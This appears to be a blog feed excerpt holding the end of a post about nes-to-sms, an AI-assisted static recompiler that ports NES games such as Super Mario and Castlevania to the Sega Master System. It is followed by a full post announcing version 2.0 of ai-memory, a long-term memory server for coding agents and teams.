<p>First: lackoftrack27&rsquo;s work is a hand reimplementation, built from the game&rsquo;s disassembly, optimized specifically for Super Mario. It&rsquo;s not a general-purpose automatic translation like the one I&rsquo;m trying to do. He solved one game, beautifully, by hand. Curiously, that reinforces what the forums already said: the path that works is reimplementing by hand, not machine-translating.</p>
<p>Second: as impressive as it is to see Super Mario on the Master System, it&rsquo;s worth remembering it is still a first-generation game, around 40kb. Meaning it is one of the simpler games on the NES. Later-generation stuff, like Super Mario Bros 3 or Kirby, nobody has tried to convert yet, and for good reasons I explain further down.</p>
<p>But the most important thing was the side effect: with the map his port gave me, I finally got my automatic conversion running properly. I came back to the project in early September, loaded lackoftrack27&rsquo;s code into Claude Fable and then the new GPT Astra, and put both of them to study what he did that I wasn&rsquo;t doing.</p>
<h2>The architecture of the solution<span class="hx:absolute hx:-mt-20" id="the-architecture-of-the-solution"></span>
    <a href="#the-architecture-of-the-solution" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Since this article is for programmers, let me open the black box.</p>
<p>The first important decision is that <code>nes-to-sms</code> is not an emulator, nor a text-to-text translator of 6502 to Z80. It is a <strong>static recompiler</strong>. It reads the NES ROM, lifts the 6502 code into an intermediate representation with explicit semantics, and from that IR it generates Z80 code. The output is a WLA-DX assembly project that compiles into a real <code>.sms</code> ROM. The core is a Rust workspace with thirteen crates, plus a hand-written Z80 runtime shared across games.</p>
<p>The flow, end to end, goes roughly like this:</p>
<ol>
<li>Parse the ROM header, split the code banks (PRG) from the tile banks (CHR), and read the reset and interrupt vectors.</li>
<li>Load a per-game profile (a TOML with labels, data regions, jump tables, mapper type, and replacements).</li>
<li>Discover the functions, build the control-flow graph, and classify every byte as code or data. A key detail enters here: every memory access is tagged with the region it belongs to (zero page, stack, RAM, PPU registers, sprite DMA, sound, mapper).</li>
<li>Lift each routine into IR, with the 6502 flags explicit. A write to the PPU register <code>$2006</code> doesn&rsquo;t become just some <code>mem[]=</code>, it becomes a first-class &ldquo;PPU write&rdquo; primitive.</li>
<li>Lower the IR to Z80. The 6502 flags are kept in a shadow status byte in RAM, and every hardware access becomes a call into the runtime.</li>
<li>Emit the Z80 bytes and also the readable WLA-DX assembly.</li>
<li>Convert the assets: the NES 2bpp tiles become SMS mode-4 4bpp tiles, the NES palette becomes SMS CRAM, and so on.</li>
<li>Write the whole SMS project, with a Makefile, runtime, and data, ready to compile.</li>
</ol>
<p>The CPU mapping is conservative on purpose. The 6502 accumulator <code>A</code> becomes the Z80 <code>A</code>, the <code>X</code> and <code>Y</code> registers live in RAM or registers, the zero page becomes a fixed block in SMS RAM, and every operation that touches a flag calls a helper. It&rsquo;s safe and correct, but this is exactly where the cost lives.</p>
<h2>Where NES and SMS really diverge<span class="hx:absolute hx:-mt-20" id="where-nes-and-sms-really-diverge"></span>
    <a href="#where-nes-and-sms-really-diverge" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The project&rsquo;s central finding is about speed, and it&rsquo;s counterintuitive.</p>
<p>The NES 6502 runs at 1.79 MHz. The Master System Z80 runs at 3.58 MHz, double the clock. You look at that and think &ldquo;so there&rsquo;s plenty of headroom.&rdquo; Except no. The Z80 spends on average about 13 cycles per instruction, while the 6502 spends about 4. In real numbers, a 3.5 MHz Z80 is roughly equivalent to a 1 MHz 6502 for general work. Meaning the SMS Z80 is actually <strong>slower</strong> than the NES 6502 for the same work. The headroom is negative.</p>
<p>Worse: the cheapest 6502 idiom, an <code>LDA table,X</code>, is one of the most expensive to emulate on the Z80. So a faithful translation of a game that already squeezed the NES to the limit simply cannot hit 60fps without overclock. The blame is on the physics of the problem, not on my translator.</p>
<p>And the video is another story. The NES sees video memory in a mapped way, with nametables, hardware scroll, and a sprite table accessed via DMA. The SMS Z80 does not address VRAM as memory: it sets an address latch and streams bytes through VDP ports. So every NES PPU write has to be captured, queued in a buffer, and flushed to the VDP during vblank. The NES flips a sprite for free, just by setting an attribute bit. The Master System has no hardware sprite flipping, so the program has to mirror the tile data in VRAM by hand, burning memory. The mid-frame screen split that NES games do, changing the scroll each scanline, also has no direct equivalent, because the VDP latches the vertical scroll at the top of the frame.</p>
<p>And there&rsquo;s still the VRAM ceiling. Super Mario&rsquo;s 8 KB of tiles become 16 KB in the SMS 4bpp format, which is the console&rsquo;s entire VRAM. Background and sprites can&rsquo;t both stay resident at once. And the code balloons 3 to 6 times in size, which is why the SMS output is already banked from the very first game, even the simplest ones.</p>
<h2>Leveraging what the SMS does best<span class="hx:absolute hx:-mt-20" id="leveraging-what-the-sms-does-best"></span>
    <a href="#leveraging-what-the-sms-does-best" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The trick to recover speed is to stop emulating NES behavior and start spending the Master System&rsquo;s strengths. The project&rsquo;s motto became &ldquo;spend ROM to buy CPU.&rdquo;</p>
<p>The SMS accepts cartridges of several megabytes. So instead of mirroring a sprite by hand at runtime, the build already generates pre-flipped variants of each sprite tile, and the flip becomes a table lookup. Instead of emulating the NES attribute table, the assembler already writes the final SMS nametable word, with the flip, palette, and priority bits baked in. The NES attribute table simply stops existing in the program. The copies to the VDP use unrolled <code>OUTI</code> blocks, faster than the generic loop. And the status-bar split, which on the NES depends on sprite-zero, becomes an SMS line interrupt, which is the native way to do it.</p>
<p>None of this is magic. The negative CPU headroom is still there, so these optimizations reduce the cost but don&rsquo;t work miracles on their own. But it&rsquo;s the difference between unplayable and playable.</p>
<h2>The real trick: making the AI run the emulator<span class="hx:absolute hx:-mt-20" id="the-real-trick-making-the-ai-run-the-emulator"></span>
    <a href="#the-real-trick-making-the-ai-run-the-emulator" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Here&rsquo;s the part I consider the most important of the whole project, and it&rsquo;s what separated the failed attempt from May from the version that finally moves.</p>
<p>Blind translation doesn&rsquo;t work. The model needs real feedback to know what&rsquo;s broken and what&rsquo;s slow. So the heart of the project is the <strong>differential oracle</strong>, the infrastructure that runs the emulators and measures reality. The translator is just the easy part.</p>
<p>It works in two layers. The first compares instruction by instruction: for each routine, the system generates random initial states, runs the original 6502 in a reference interpreter and runs the generated Z80, and compares the result (accumulator, registers, flags, touched RAM). Any divergence raises a flag. The second layer compares frame by frame: it runs the NES ROM as absolute ground truth and the SMS build side by side, with the same button script, and compares RAM byte by byte on every frame. That was later extended with an oracle that checks the SMS VRAM and palette, and with a visual oracle that compares the output against the real NES frame.</p>
<p>This measurement loop is what unlocked the recent fixes. It wasn&rsquo;t guesswork. Two concrete examples:</p>
<p>In Super Mario, every optimization step was measured in cycles per frame, with the emulator actually running. A frame&rsquo;s budget is 59,736 cycles. The baseline sat at around 370 thousand cycles per frame, something like 6 times over budget, which gave about 10fps and explained the need for that brutal 500% overclock. Measuring step by step, each change validated by the oracle, it dropped to 118,296 cycles per frame, or 1.98 times the budget. It went from 6 times to under 2 times. It now runs at full speed already in the emulator&rsquo;s standard overclock, and it&rsquo;s comfortable in the 200 to 300% range, versus the 500 to 700% from the start.</p>
<p>In Castlevania, the biggest speed win came from a profile only the emulator could reveal: a sprite-zero wait loop, at address <code>$F8C7</code>, was doing 255 status reads and exiting by timeout every single time, consuming almost 23% of the entire CPU. Without running the emulator and measuring, nobody would find this by eye. With the measurement, the fix was surgical.</p>
<p>This is the bigger argument I&rsquo;ve been hammering for a while about agents: an LLM that only generates code in the dark makes big mistakes. An LLM that can actually run the target, collect real data, and react to what it measured plays in another league.</p>
<h2>What I learned studying lackoftrack27&rsquo;s port<span class="hx:absolute hx:-mt-20" id="what-i-learned-studying-lackoftrack27s-port"></span>
    <a href="#what-i-learned-studying-lackoftrack27s-port" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>With that oracle in place, I put Claude Fable and GPT Astra to dissect lackoftrack27&rsquo;s port, which is a reimplementation of the same game from the same disassembly I translate. That settled once and for all a doubt that was blocking me: Super Mario fits on the Master System. My 6-times overrun on the budget was 100% translation overhead, not a limitation of the game or the hardware.</p>
<p>His wins, in order of impact, were roughly these:</p>
<ul>
<li><strong>The biggest of all: the data representation.</strong> He reorganized the game&rsquo;s object arrays into RAM pages, one per slot, with the same field offsets. Then the 6502&rsquo;s <code>X</code> becomes the register <code>H</code> and the field name becomes <code>L</code>, and an access that cost about 70 time units in my translator now costs 14. The cruel detail is that this only works because the programmer knows, from memory, that this particular <code>X</code> is always an object index between 0 and 6. A static translator has no way to safely discover that invariant. This is the most powerful optimization, and it&rsquo;s precisely the one automatic translation can&rsquo;t prove on its own. It&rsquo;s the residual that holds back the last 2 times in speed.</li>
<li><strong>Flags audited, not emulated.</strong> He checked the code and found only about 10 places that genuinely depend on some 6502 carry quirk. The rest uses the Z80&rsquo;s native flags. That confirmed a measurement of mine: spending energy emulating flags yields almost nothing.</li>
<li><strong>Native calls.</strong> <code>JSR</code> becoming a real <code>CALL</code>, without the expensive emulated-stack bookkeeping. That was the biggest generic win I ported over to my pipeline.</li>
<li><strong>PPU deleted at build time</strong>, not emulated at runtime, exactly as I described in the section on leveraging the SMS.</li>
<li><strong>Frame architected to overrun gracefully</strong>, turning an overrun into a clean lag frame instead of corrupting the screen.</li>
</ul>
<p>I adopted what could be generalized, and Super Mario dropped from 6 times to under 2 times the budget. This is the result running today:</p>
<div class="embed-container">
  <video controls preload="metadata" playsinline style="position:absolute;top:0;left:0;width:100%;height:100%;border:0;background:#000;">
    <source src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/20260907152243_smb-sms-conversion.mp4" type="video/mp4">
  </video>
</div>
<p>The most honest lesson from this study is twofold. The real wins are in the data representation and the calling convention, not in what I had attacked first. And the deepest win of all is exactly what the automatic translator can&rsquo;t infer. That draws the ceiling of what can be automated pretty clearly.</p>
<h2>Castlevania and the mapper problem<span class="hx:absolute hx:-mt-20" id="castlevania-and-the-mapper-problem"></span>
    <a href="#castlevania-and-the-mapper-problem" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>With Super Mario moving, I went back to my old target: the first Castlevania. And here we hit the NES&rsquo;s most serious limitation.</p>
<p>The NES is a simple console, with a bunch of limits. One of the main ones is that it doesn&rsquo;t support games bigger than about 40kb of ROM, because the 6502 only sees a 32 KB window of program in its address space. The &ldquo;solution&rdquo; from back then was brilliant and a bit crazy: parts of the console were being upgraded by the cartridge itself.</p>
<p>Many people think a cartridge is just a ROM chip with the game code. In the NES case, it&rsquo;s not. The cartridges came with a variety of extra chips that increased the console&rsquo;s capability, be it a better sound chip or, much more commonly, the <strong>mappers</strong>. There are several different mappers, from Nintendo itself and from third parties like Capcom and Konami. They use a technique called <strong>bank switching</strong>: since the 6502 can&rsquo;t see enough address space, the mapper swaps which pieces of ROM are visible in that 32 KB window, as the game asks. That&rsquo;s how big games fit into a console that, on paper, couldn&rsquo;t handle them.</p>
<p>I already explained this in detail in an old video from my channel, <a href="/2020/06/18/akitando-81-aprendendo-sobre-computadores-com-super-mario-do-jeito-hardcore/">Akitando #81, about learning computing with Super Mario the hardcore way</a>:</p>


<div class="embed-container">
  <iframe
    src="https://www.youtube.com/embed/hYJ3dvHjeOE"
    title="YouTube video player"
    frameborder="0"
    allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share"
    referrerpolicy="strict-origin-when-cross-origin"
    allowfullscreen>
  </iframe>
</div>

<p>Castlevania uses one of the earlier mappers, the UxROM. And here is the scale problem of my project: if I want to be able to translate the majority of NES games, I have to map every mapper, one by one. Today the project implements only two: the NROM, which is Super Mario&rsquo;s bare cartridge, and Castlevania&rsquo;s UxROM. All the others, the MMC1, MMC3, and company, are only planned. Each mapper is quite a bit of work to implement, because it&rsquo;s not enough to understand the NES bank switching, you have to translate that behavior into the Master System&rsquo;s own mapper.</p>
<p>The good news is that the Master System is also a banked system, so the mapping is &ldquo;the same shape one level up.&rdquo; A NES PRG bank becomes a set of SMS banks, a NES bank-switch write becomes a write to the SMS mapper through a shim, and a call that crosses banks uses the &ldquo;gate&rdquo; machinery that already exists. A routine&rsquo;s identity becomes the pair (bank, address), and a dispatch table resolves that at runtime. When it doesn&rsquo;t find it, it fails closed, with a trap, instead of running garbage.</p>
<p>This is where bigger games will hit the wall. The tile bank switching of the more advanced mappers, the scanline interrupt timing of the MMC3 and MMC5, and the SMS&rsquo;s own bank ceiling for a really big NES game, all of that is still unsolved. That&rsquo;s why I still can&rsquo;t say whether a Super Mario Bros 3 is viable or not. It&rsquo;s quite possible the bigger games die exactly at this step.</p>
<p>Either way, I worked a good bit more on Castlevania in this comeback. I fixed a pile of things using the oracle: the sprite-zero loop that ate CPU, the weapon and projectile logic that lost call returns, a scroll glitch in the status bar, the VRAM collision between 8x16 and 8x8 sprites, and the coherence between background, palette, HUD, and sprites. Today Castlevania boots, accepts start, draws a recognizable first stage, responds to the controller, and runs for a good while without crashing. But it&rsquo;s honest to say it still runs slowly, and the path I use to play it is Mednafen at 500% overclock, and even then it&rsquo;s still 2 to 3 times below its own speed target. It&rsquo;s far from pixel-perfect and real-time.</p>
<div class="embed-container">
  <video controls preload="metadata" playsinline style="position:absolute;top:0;left:0;width:100%;height:100%;border:0;background:#000;">
    <source src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/20260907152243_castlevania-sms-conversion.mp4" type="video/mp4">
  </video>
</div>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>After so many weeks and so many attempts, I still don&rsquo;t know how much more can be squeezed out of an automatic translation. The ceiling might be close, because the deepest optimizations are precisely the ones a machine can&rsquo;t infer on its own.</p>
<p>But there&rsquo;s a path that excites me. The automatic translation can become a baseline. An SMS conversion that already runs, correct, even if slow, and that can later be optimized by hand, game by game, exactly like lackoftrack27 did with Super Mario and like so many people have been doing with decompilations and ports out there. The oracle guarantees the base is correct, and the human hand steps in to do what the machine can&rsquo;t.</p>
<p>Porting a game to much better hardware, like a PC port, is relatively easy, because there&rsquo;s capacity to spare. The truly hard part is fitting the game into a same-generation console, where nothing is to spare. And it&rsquo;s exactly that difficulty that makes the idea of making better versions of NES games for the Master System so appealing. It&rsquo;s the console that deserved to have had those games, and never did.</p>
<p>I hope more people get excited about this possibility and contribute to the project. It&rsquo;s all open at <a href="https://github.com/akitaonrails/nes-to-sms"target="_blank" rel="noopener">nes-to-sms</a>. If you enjoy 6502, Z80, VDP, and the challenge of squeezing cycles out of 40-year-old hardware, come by. There&rsquo;s plenty of room.</p>
]]></content:encoded><category>retrocomputing</category><category>coding-agents</category><category>gaming</category><category>emulation</category></item><item><title>AI-MEMORY 2.0 - The Best Memory System for Agents and Teams</title><link>https://www.akitaonrails.com/en/2026/09/02/ai-memory-2-0-best-memory-system-for-agents-and-teams/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/09/02/ai-memory-2-0-best-memory-system-for-agents-and-teams/</guid><pubDate>Wed, 02 Sep 2026 11:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; &lt;a href="https://github.com/akitaonrails/ai-memory/releases/tag/v2.0.0"target="_blank" rel="noopener"&gt;ai-memory 2.0 is out&lt;/a&gt;, with the open OKF format, local embeddings turned on by default, and real support for several agents and a whole team working on the same project in parallel. The full pitch is below.&lt;/p&gt;
&lt;p&gt;Back in July I published &lt;a href="https://www.akitaonrails.com/en/2026/07/20/whats-new-ai-memory-switch-agents-without-losing-session/"&gt;What&amp;rsquo;s New in My AI-MEMORY&lt;/a&gt;, where I showed off &lt;code&gt;ai-memory run&lt;/code&gt;: switching from Claude Code to Codex without losing your line of work. That day we were on version 1.17.1.&lt;/p&gt;</description><content:encoded><![CDATA[<p><strong>TL;DR:</strong> <a href="https://github.com/akitaonrails/ai-memory/releases/tag/v2.0.0"target="_blank" rel="noopener">ai-memory 2.0 is out</a>, with the open OKF format, local embeddings turned on by default, and real support for several agents and a whole team working on the same project in parallel. The full pitch is below.</p>
<p>Back in July I published <a href="/en/2026/07/20/whats-new-ai-memory-switch-agents-without-losing-session/">What&rsquo;s New in My AI-MEMORY</a>, where I showed off <code>ai-memory run</code>: switching from Claude Code to Codex without losing your line of work. That day we were on version 1.17.1.</p>
<p>Today <strong>2.0</strong> shipped. And this time I&rsquo;m not going to rehash how the hooks work or how a session turns into a wiki page. That&rsquo;s already in the earlier posts. Here I want to talk about where ai-memory landed against the competition, what 2.0 brings, and why it earned the jump to a &ldquo;2&rdquo;.</p>
<p>If you&rsquo;ve never heard of the project, the summary is short. ai-memory is a long-term memory server for your coding agents. It captures what happened in the session, consolidates it into Markdown pages, and hands the right context to the next agent, whatever the harness or the machine.</p>
<p><img src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/20260902132131_screenshot-2026-09-02_13-20-02.png" alt="ai-memory 2.0 web browser showing the wiki’s project list, with the pre-migration OKF backup notice and cards for several projects like ai-memory, akitaonrails-hugo, and others"  loading="lazy" /></p>
<p>This is the web interface that comes with it, handy for auditing what the agents wrote and for browsing between projects. Notice how each project lives separately, with its own page count, all of it coming out of real sessions.</p>
<h2>Why it became 2.0<span class="hx:absolute hx:-mt-20" id="why-it-became-20"></span>
    <a href="#why-it-became-20" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>For me, the first digit of a version carries a commitment.</p>
<p>The 1.x line grew too fast. We went from 1.1 to 1.39 in a little over two months, stacking feature on top of feature in minor releases. It worked for iterating, but it blurred what the numbers meant.</p>
<p>2.0 fixes that. It bundles the few compatibility-breaking changes into a single major, and from here on versioning follows real <a href="https://github.com/akitaonrails/ai-memory/blob/main/CONTRIBUTING.md"target="_blank" rel="noopener">Semantic Versioning</a>. A fix is a patch. A new feature is a minor. Only a format or contract break is a major, and always with warning. The new contributing guide spells that rule out for any PR.</p>
<p>The main break is the new on-disk format. The first time you bring up 2.0, it migrates your wiki on its own. Before touching anything, it compresses your entire data directory into a verified backup with the date in the name. If the backup can&rsquo;t be written and checked, the migration aborts and the server refuses to start. No &ldquo;trust me&rdquo;.</p>
<p><img src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/20260902131952_screenshot-2026-09-02_13-16-17.png" alt="ai-memory 2.0 dialog announcing that the memory was migrated to the OKF v0.2 format, showing the verified backup path and the rollback steps"  loading="lazy" /></p>
<p>This is the notice that shows up once, right after the migration: it tells you where the backup landed, the file size, and how to roll back if something looks off. Once you confirm everything is fine, you just delete the backup and the reminder disappears.</p>
<h2>OKF: your memory isn&rsquo;t locked inside ai-memory<span class="hx:absolute hx:-mt-20" id="okf-your-memory-isnt-locked-inside-ai-memory"></span>
    <a href="#okf-your-memory-isnt-locked-inside-ai-memory" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>This is the change that made me happiest.</p>
<p>Starting with 2.0, the ai-memory wiki is, natively, a bundle in the <strong>Open Knowledge Format</strong>, the open format Google published in 2026. Each memory page is a valid OKF file: plain Markdown with standardized metadata. There&rsquo;s no export step that produces a divergent copy. The wiki files already are the OKF files.</p>
<p>In practice that means your memory stopped being a hostage of my project. You can read it all with <code>grep</code>, open it in Obsidian, version it in Git, or hand the bundle to a coworker who uses another OKF-compatible tool. There&rsquo;s even an <code>ai-memory export-okf</code> to package a whole project into a validated tarball.</p>
<p>That was always the thesis: the model and the harness are rented, the project&rsquo;s memory is yours. Now the format backs that up in writing.</p>
<h2>Local embeddings, on by default<span class="hx:absolute hx:-mt-20" id="local-embeddings-on-by-default"></span>
    <a href="#local-embeddings-on-by-default" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Up through 1.x, real semantic search depended on you configuring an embeddings provider. Either you paid for an API and sent every page and every query out, or you spun up an Ollama on the side. Both options have a cost.</p>
<p>2.0 brings a <code>local</code> provider that runs the embeddings model inside the process itself, in pure Rust, with <code>all-MiniLM-L6-v2</code>. No API key, no external server, no GPU, and nothing about your data leaving the box. And now it comes on by default. On the first run it downloads the model (about 87 MB, with a fixed checksum) in the background and turns on hybrid search at the next restart.</p>
<p>The gain is measurable. On the LongMemEval-S benchmark, hit@5 goes from 0.617 with full-text only to 0.779 with the local embeddings. If for some reason you don&rsquo;t want it, an <code>embedding_provider = &quot;none&quot;</code> turns it off.</p>
<p>A detail that matters: I chose <code>candle</code> on purpose, instead of the native runtime the competition uses. That native layer is exactly what caused a recurring kind of crash in other memory projects. I preferred not to inherit the problem.</p>
<h2>Several agents at once, on the same project<span class="hx:absolute hx:-mt-20" id="several-agents-at-once-on-the-same-project"></span>
    <a href="#several-agents-at-once-on-the-same-project" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Here&rsquo;s where the part that drove most of the work before 2.0 begins.</p>
<p>The <code>ai-memory run</code> case I showed in July was sequential: I close Claude, open Codex, keep going. But what about when I leave two or three harnesses open at the same time on the same project? Claude in one tab, Codex in another, OpenCode in a third.</p>
<p>ai-memory handles that without anyone stepping on anyone else. Each memory call figures out on its own which project it belongs to, from the session&rsquo;s directory. The &ldquo;current project&rdquo; pointer is now per actor, so two harnesses in the same checkout each keep their own sense of context. And the project&rsquo;s identity comes from the checkout name. The absolute path on disk doesn&rsquo;t count, so the same project on the laptop and on the desktop lands in the same place.</p>
<p>When two windows write to the same page, the second doesn&rsquo;t erase the first. It creates a new version that becomes the latest, and the previous one stays reachable in the version chain. Writing something identical doesn&rsquo;t create a new version. Every write goes through a single writer, with a queue and backpressure, so a burst doesn&rsquo;t corrupt anything.</p>
<p>This isn&rsquo;t theory. There&rsquo;s an acceptance test calling Claude, Codex, OpenCode, Pi, Crush, and a few others for real, inside a single workstream, covering leases, session adoption, and context handoff between harnesses.</p>
<h2>A whole team on the same project<span class="hx:absolute hx:-mt-20" id="a-whole-team-on-the-same-project"></span>
    <a href="#a-whole-team-on-the-same-project" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The second scenario is the one that gives the post its title. Here it&rsquo;s several people, a whole team pointing their agents at the same server.</p>
<p>The way to run it is simple. Someone brings up a server, usually a container in a homelab or on a machine on the network, and each person points their agents at that URL. HTTPS goes in front with a reverse proxy, if you want. The database is still a single SQLite.</p>
<p>Everyone sees the same project pages. What one person learned in a session, the other&rsquo;s agent recovers. And each new session gets a briefing with the project&rsquo;s state right at the start. I&rsquo;ll be honest about the term &ldquo;real time&rdquo;. What exists is a shared central store, with immediate reads, plus the briefing at the open. The note a coworker wrote shows up right away for anyone&rsquo;s next query or next session. A session that&rsquo;s already running only gets the news at the next query or the next open, with no interruption mid-flight.</p>
<p>What changes in multi-user mode is attribution. Each write records who did it. There&rsquo;s an audit log and the interface shows &ldquo;edited by so-and-so&rdquo;. That comes in the box, for free. And there&rsquo;s no per-page permission, on purpose. Attribution is there to record authorship; anyone authenticated can write, and the history is what keeps track of who did.</p>
<p>There&rsquo;s an important security distinction between what&rsquo;s shared and what&rsquo;s personal. The pages belong to everyone. But the handoff is a baton with a single owner: exactly one session takes it, and a second <code>accept</code> doesn&rsquo;t steal the baton from anyone. The handoff you left pending isn&rsquo;t delivered to or consumed by a coworker. Likewise, the &ldquo;what I&rsquo;m working on right now&rdquo; slots are per person, so your personal context doesn&rsquo;t leak into the whole team&rsquo;s briefing.</p>
<p>There&rsquo;s also a battery of real concurrency tests covering these cases: simultaneous writes, per-actor isolation under load, the handoff baton that doesn&rsquo;t get stolen, and the personal slots that don&rsquo;t leak.</p>
<h2>Where ai-memory stands against the competition<span class="hx:absolute hx:-mt-20" id="where-ai-memory-stands-against-the-competition"></span>
    <a href="#where-ai-memory-stands-against-the-competition" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Before 2.0 we did another round of research on the 2026 landscape, documented in the repository. It was the basis for deciding what 2.0 needed to cover. Let me summarize the field.</p>
<p>There&rsquo;s <strong>agentmemory</strong>, a TypeScript MCP server tied to a native sidecar and a giant surface of dozens of tools. There&rsquo;s <strong>basic-memory</strong>, in Python, Markdown on disk, but with manual capture: you have to ask it to remember. There&rsquo;s <strong>cognee</strong>, which combines graph, vector, and relational into a heavy pipeline that wants several gigs of RAM. There&rsquo;s <strong>MemPalace</strong>, which went viral with almost 50,000 stars in two weeks over a benchmark number that, once audited, turned out to be inflated, on top of suffering corruption when two writes happen together. And there are the temporal graphs like <strong>Zep</strong>, the &ldquo;memory OS&rdquo; like <strong>Letta</strong> (the old MemGPT), and the fact extractors like <strong>Mem0</strong>.</p>
<p>There&rsquo;s also the native memory that Claude Code itself started turning on by default. I treat that one as the funnel that introduces the category to people. As a competitor it stays limited: tied to one machine, tied to one agent, without real search and without team history.</p>
<p>2.0 closes the gaps the research pointed out. We started publishing a reproducible benchmark with LongMemEval, running the actual server. We got the open OKF format. We got typed links between pages, with <code>causes</code>, <code>fixes</code>, and <code>contradicts</code>, which also feed a contradiction check without spending an LLM. We got queries with <code>as_of</code>, to ask what we knew about a subject on a given date. We got the local embeddings. And we got an optional &ldquo;experience&rdquo; pass that reviews several sessions to find patterns that only show up across the set.</p>
<p>Now the part that matters for whoever&rsquo;s choosing. What ai-memory has that the others don&rsquo;t, all together:</p>
<ul>
<li><strong>It follows you across agents.</strong> More than twenty harnesses feed a single memory, and the handoff here is a real protocol: typed, with an owner, and claimed exactly once.</li>
<li><strong>It follows you across machines.</strong> The memory lives on a server that&rsquo;s yours. The project you dropped on the desktop is the one you pick back up on the laptop.</li>
<li><strong>It works for a team.</strong> Multi-user authentication, per-person attribution, and an audit log come in the box, for free.</li>
<li><strong>Your memory is plain Markdown.</strong> The source of truth is a wiki versioned in Git. The database is a derived index you can rebuild at any moment from the files, with no vector store to babysit and nothing trapped in a binary blob.</li>
<li><strong>It captures the work on its own, quietly.</strong> No &ldquo;remember this&rdquo; ceremony. And the default path runs with zero LLM calls.</li>
<li><strong>It&rsquo;s a single binary.</strong> No sidecar, no three databases to sync. Every write goes through a single writer, with a write ceiling we actually measured, with a real test. That design is exactly what avoided the concurrent-write corruption that took the others down.</li>
</ul>
<p>No competitor delivers this set. Some have one piece or another. ai-memory has the whole package, and now with parity on the items where it used to fall behind.</p>
<h2>2.0 belongs to everyone<span class="hx:absolute hx:-mt-20" id="20-belongs-to-everyone"></span>
    <a href="#20-belongs-to-everyone" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>When I wrote the July post, fifteen people had a merged PR in the project. Today it&rsquo;s around seventy. This stopped being a weekend project a long time ago.</p>
<p>The numbers up to 2.0: more than 1,500 commits, <strong>371 merged pull requests</strong>, and <strong>181 closed issues</strong>. That came from people actually using it and sending fixes, features, and documentation.</p>
<p>I have to give special thanks to <a href="https://github.com/djalmajr"target="_blank" rel="noopener">Djalma Júnior</a>, who on his own passed 50 merged PRs, and to <a href="https://github.com/samirhvbr"target="_blank" rel="noopener">Samir Hanna Verza</a>, with more than 20. Right behind come <a href="https://github.com/lhzapata"target="_blank" rel="noopener">lhzapata</a>, <a href="https://github.com/pedrofjr"target="_blank" rel="noopener">pedrofjr</a>, <a href="https://github.com/mrpaiva"target="_blank" rel="noopener">mrpaiva</a>, <a href="https://github.com/lucasliet"target="_blank" rel="noopener">lucasliet</a>, <a href="https://github.com/lihuiyang1024"target="_blank" rel="noopener">lihuiyang1024</a>, <a href="https://github.com/Murillofilho86"target="_blank" rel="noopener">Murillofilho86</a>, and <a href="https://github.com/matheus-rodrigues00"target="_blank" rel="noopener">Matheus Rodrigues</a>. And there&rsquo;s a long tail of dozens of other people with a merged PR that it would be unfair to try to list in full here.</p>
<p>If you want in on this, the <a href="https://github.com/akitaonrails/ai-memory/blob/main/CONTRIBUTING.md"target="_blank" rel="noopener">contributing guide</a> was rewritten to make everything clear: how to set up the environment, the gates the CI enforces, the CHANGELOG rule, and the versioning policy. A bug fix usually ships fast in the next patch. A small feature, like a new harness or provider, goes into the next minor. There are issues tagged for people just starting out.</p>
<h2>How to get 2.0<span class="hx:absolute hx:-mt-20" id="how-to-get-20"></span>
    <a href="#how-to-get-20" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The project page has every install method, including AUR, Homebrew, and release binaries:</p>
<ul>
<li><a href="https://github.com/akitaonrails/ai-memory"target="_blank" rel="noopener">ai-memory on GitHub</a></li>
<li><a href="https://github.com/akitaonrails/ai-memory/releases/tag/v2.0.0"target="_blank" rel="noopener">v2.0.0 release notes</a></li>
</ul>
<p>After updating, on the first run let the migration take the backup and convert your wiki to the OKF format. If you use the managed mode, reinstall the hooks for the harnesses you plan to use.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>1.x proved the idea worked. 2.0 is the version I&rsquo;d recommend without an asterisk for someone else to put on a team.</p>
<p>The format is open, so your memory doesn&rsquo;t get locked in. Semantic search runs local, so you don&rsquo;t pay and you don&rsquo;t leak. Several agents and several people work on the same project without running each other over. And the single-binary, single-writer design is what avoids exactly the problems that sank half the competition.</p>
<p>The LLM and the subscription I keep renting from whoever&rsquo;s best that month. The project&rsquo;s memory stays with me, with the team, and now in a format nobody can take away from me.</p>
